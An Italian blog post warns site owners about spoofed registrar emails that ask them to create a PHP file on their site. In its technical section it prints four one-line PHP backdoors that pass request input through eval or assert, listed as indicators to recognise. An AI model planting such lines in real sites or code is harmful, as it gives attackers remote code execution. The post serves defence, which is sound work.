Non fidarti di quelle false email di conferma del dominio
Se ricevi una lettera di qualsiasi tipo che richiede di creare, scaricare o installare del codice PHP sul tuo sito web, devi ignorarla
English version: Do not trust those fake domain confirmation emails
Recentemente alcuni dei miei clienti hanno ricevuto strane lettere di posta elettronica dai loro registrar di domini. Quelle lettere contengono una richiesta di conferma dei propri domini. Ho controllato una di quelle lettere e l'ho subito identificata come una lettera fraudolenta . Tutte le lettere hanno uno schema identico e una richiesta di creare un file PHP nella cartella principale di un sito Web con un nome specifico e il contenuto specificato. Inutile dire che il contenuto suggerito per quel file PHP contiene codice dannoso noto come codice backdoor. Questo tipo di codice consente all'aggressore di eseguire qualsiasi azione desideri sul sito Web di una vittima.
Se ricevi una lettera di qualsiasi tipo che richiede di creare, scaricare o installare del codice PHP sul tuo sito web, devi ignorarla. Nessuna eccezione. Anche se la lettera arriva dal presidente o da tua madre.
Le lettere fraudolente sembrano legittime a causa dell'indirizzo e-mail mittente legittimo. Ma è uno spoofing di posta elettronica. Non ti aspetti di ricevere un'e-mail falsa dai tuoi amici o dal tuo registrar di domini. Giusto? NO! Qualsiasi lettera di posta elettronica può contenere qualsiasi indirizzo di posta elettronica del mittente. La stragrande maggioranza dei server di posta elettronica e dei client di posta elettronica non controlla o verifica l'indirizzo del mittente. Quindi, lo vedi come voleva un hacker. Non devi fidarti di nessuna lettera e-mail che hai ricevuto da un mittente noto se la lettera contiene una richiesta per un'azione sospetta come l'installazione di codice sul tuo sito Web o un'applicazione sul tuo computer.
Dettagli tecnici
Le e-mail false di solito contengono alcune delle seguenti righe PHP.
assert(stripslashes($_REQUEST['something']));
eval(stripslashes($_REQUEST['something']));
assert(base64_decode($_REQUEST['something']));
eval(base64_decode($_REQUEST['something']));
Cordiali saluti: base64_decode, eval e assert sono indicatori ben noti di codice PHP sospetto o dannoso.
Vedi anche: Plugin Inspector rivela problemi di sicurezza con altri plugin